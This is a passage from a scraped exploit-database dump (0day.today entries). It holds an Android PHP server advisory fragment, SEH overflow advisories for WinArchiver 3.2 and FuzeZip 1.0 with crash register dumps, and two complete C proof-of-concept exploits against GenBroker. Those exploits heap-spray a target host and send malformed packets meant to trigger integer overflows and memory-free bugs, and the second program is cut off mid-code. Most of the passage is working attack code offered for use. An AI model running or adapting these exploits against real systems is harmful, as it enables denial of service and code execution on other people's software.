id\r\nuid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $\r\n\r\nlighttpd / PHP server\r\n\r\n \u2022 php has the following functions available:\r\nVia\r\n<?php\r\n\r\n $arr = get_defined_functions();\r\n echo \"<pre>\";\r\n print_r($arr);\r\n echo \"</pre>\";\r\n\r\n?>\r\n\r\nReturned 1300 functions, including exec, pass_thru system() and\r\n\r\n [662] => socket_select\r\n [663] => socket_create\r\n [664] => socket_create_listen\r\n [665] => socket_create_pair\r\n [666] => socket_accept\r\n [667] => socket_set_nonblock\r\n [668] => socket_set_block\r\n [669] => socket_listen\r\n [670] => socket_close\r\n [671] => socket_write\r\n [672] => socket_read\r\n [673] => socket_getsockname\r\n [674] => socket_getpeername\r\n [675] => socket_connect\r\n [676] => socket_strerror\r\n [677] => socket_bind\r\n [678] => socket_recv\r\n [679] => socket_send\r\n [680] => socket_recvfrom\r\n [681] => socket_sendto\r\n [682] => socket_get_option\r\n [683] => socket_set_option\r\n [684] => socket_shutdown\r\n [685] => socket_last_error\r\n [686] => socket_clear_error\r\n [687] => socket_import_stream\r\n [688] => socket_getopt\r\n [689] => socket_setopt\r\n\r\n\r\nVendor Notified: 9/10/2013\r\n\r\nThe full list is here:\r\n\r\nhttp://vapid.dhs.org/advisories/ultimate-server-android-vulns.html\r\n\r\n-- Larry\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21336"}, {"lastseen": "2018-02-19T21:25:38", "bulletinFamily": "exploit", "description": "WinArchiver version 3.2 suffers from a SEH-based buffer overflow vulnerability.", "modified": "2013-09-03T00:00:00", "published": "2013-09-03T00:00:00", "id": "1337DAY-ID-21196", "href": "https://0day.today/exploit/description/21196", "type": "zdt", "title": "WinArchiver 3.2 SEH Buffer Overflow Vulnerability", "sourceData": "Title: SEH BUFFER OVERFLOW IN WINARCHIVER V.3.2\r\n Severity: Critical\r\n History: 24.Apr.2013 Vulnerability reported\r\n Authors: Josep Pi Rodriguez, Pedro Guillen Nu\u00f1ez , Miguel Angel de Castro Simon\r\n Organization: RealPentesting\r\n URL: http://www.realpentesting.blogspot.com\r\n Product: WinArchiver\r\n Version: 3.2\r\n Vendor: PowerSoftware\r\n Url Vendor: http://winarchiver.com\r\n Platform: Windows\r\n Type of vulnerability: SEH buffer overflow\r\n Issue fixed in version: (Not fixed)\r\n CVE identifier: CVE-2013-5660\r\n\r\n[ DESCRIPTION SOFTWARE ]\r\n\r\nFrom vendor website:\r\nWinArchiver is a powerful archive utility, which can open, create, and manage archive files. It supports almost all archive formats, including zip, rar, 7z, iso, and other popular formats. WinArchiver can also mount the archive to a virtual drive without extraction.\r\n\r\n[ VULNERABILITY DETAILS ]\r\n\r\nWinArchiver suffers from a SEH based overflow\r\nAbove you can see the debugged process after the seh overflow. As you can see in the bold letters the structure exception handler (seh) has overwritten by 00410041 which is manipulated by us. The proof of concept .zip file is attached in this mail. You have to open the .zip with WinArchiver and click the extract button in order to trigger the vulnerability.\r\n\r\nRegisters\r\n---------\r\neax=00000041 ebx=000017a6 ecx=043b0000 edx=7fffdf41 esi=043aed84 edi=043aed58\r\neip=004e64cb esp=043ae8cc ebp=043ae8d0 iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\Archivos de Programa\\WinArchiver\\WinArchiver.exe\r\nWinArchiver+0xe64cb:\r\n004e64cb 668901 mov word ptr [ecx],ax ds:0023:043b0000=????\r\nSeh chain\r\n----------\r\n!exchain\r\n043aff0c: WinArchiver+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\nBy opening a specially crafted zip file, it is possible to execute arbitrary code.We can sucesfully exploit the vulnerability in order to gain code execution.\r\n\r\n[ VENDOR COMMUNICATION ]\r\n\r\n20/04/2013 : vendor contacted.No response\r\n24/04/2013 : vendor contacted again.No response\r\n29/04/2013: PUBLIC DISCLOSURE\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21196"}, {"lastseen": "2018-02-17T23:26:32", "bulletinFamily": "exploit", "description": "FuzeZip version 1.0.0.131625 suffers from a SEH based overflow and stack based overflow which is protected by stack cookies.", "modified": "2013-09-03T00:00:00", "published": "2013-09-03T00:00:00", "id": "1337DAY-ID-21194", "href": "https://0day.today/exploit/description/21194", "type": "zdt", "title": "FuzeZip 1.0 SEH Buffer Overflow Vulnerability", "sourceData": "Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0\r\n Severity: High\r\n History: 16.Apr.2013 Vulnerability reported\r\n Authors: Josep Pi Rodriguez, Pedro Guillen Nu\u00f1ez , Miguel Angel de Castro Simon\r\n Organization: RealPentesting\r\n URL: http://www.realpentesting.blogspot.com\r\n Product: FuzeZip\r\n Version: 1.0.0.131625\r\n Vendor: Koyote-Lab Inc\r\n Url Vendor: http://fuzezip.com/\r\n Platform: Windows\r\n Type of vulnerability: SEH buffer overflow\r\n Issue fixed in version: (Not fixed)\r\n CVE identifier: CVE-2013-5656\r\n\r\n[ DESCRIPTION SOFTWARE ]\r\n\r\nFrom vendor website:\r\nFuzeZip is a sophisticated, yet easy to use, free compression tool that is based on 7-Zip technology.\r\nFuzeZip's software has a powerful compression engine that enables fast zipping and unzipping of Zip archives, as well as creating Zip-compatible files.\r\nFuzeZip has a user-friendly interface that makes creating, opening, extracting and saving compressed files very easy to do.\r\n\r\n[ VULNERABILITY DETAILS ]\r\n\r\nFuzeZip suffers from a SEH based overflow and stack based overflow which is protected by stack cookies.\r\nAbove you can see the debugged process after the seh overflow:\r\n\r\nRegisters\r\n---------\r\neax=00000041 ebx=00000000 ecx=00130000 edx=048d6798 esi=0012e434 edi=00000008\r\neip=004e8bf3 esp=0012dd10 ebp=0012dd48 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for fuzeZip.exe -\r\nfuzeZip!boost::archive::detail::iserializer<boost::archive::xml_wiarchive,std::list<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> >,std::allocator<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> > > > >::load_object_data+0x41113:\r\n004e8bf3 668901 mov word ptr [ecx],ax ds:0023:00130000=6341\r\nSeh chain\r\n----------\r\n0012de34: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012dfbc: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012e100: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012e2ac: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012ec1c: fuzeZip+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\nBy opening a specially crafted zip file, it is possible to execute arbitrary code.We can sucesfully exploit the vulnerability in order to gain code execution and\r\nbypassing SAFESEH.\r\n\r\n[ VENDOR COMMUNICATION ]\r\n\r\n16/04/2013 : vendor contacted\r\n17/04/2013: automatic response from vendor but no reponse after\r\n17/04/2013: vendor contacted again but no response\r\n29/04/2013.- PUBLIC DISCLOSURE\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21194"}, {"lastseen": "2018-01-05T03:05:45", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18889", "href": "https://0day.today/exploit/description/18889", "type": "zdt", "title": "GenBroker <= 9.21.201.01 multiple integer overflows", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n-------------\r\ngenesis_iof.c\r\n-------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple integer overflows \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x89a;\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x2000, 16);\r\n p += putxx(p, 0x20000001, 32);\r\n p += putxx(p, 0, 32);\r\n break;\r\n }\r\n case 2: {\r\n type = 0x453;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 16);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0x4b2;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 6: {\r\n type = 0x7d0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 7: {\r\n type = 0xDAE;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 8: {\r\n type = 0xfa4;\r\n p += putxx(p, 0x20000001, 32);\r\n break;\r\n }\r\n case 9: {\r\n type = 0xfa7;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 10: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 11: {\r\n type = 0x1c84;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x10000001, 32);\r\n break;\r\n }\r\n case 12: {\r\n type = 0x26AC;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n // the following part is not needed so can be removed\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18889"}, {"lastseen": "2018-01-10T19:05:29", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18890", "href": "https://0day.today/exploit/description/18890", "type": "zdt", "title": "GenBroker <= 9.21.201.01 multiple memory free vulnerabilities", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-----------\r\ngenesis_1.c\r\n-----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n#define ELEMENTS 0xfff\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple memory free vulnerabilities \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisory for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32); // elements of the first array (numbers)\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32); // elements of the second array (strings)\r\n p += putxx(p, ELEMENTS, 32); // elements of the third array (strings\r\n break;\r\n }\r\n case 2: {\r\n type = 0x4b2;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0xDAE;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n // for this type of attack the data must be supplied before\r\n // the malformed packet so the following is useless\r\n //p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, 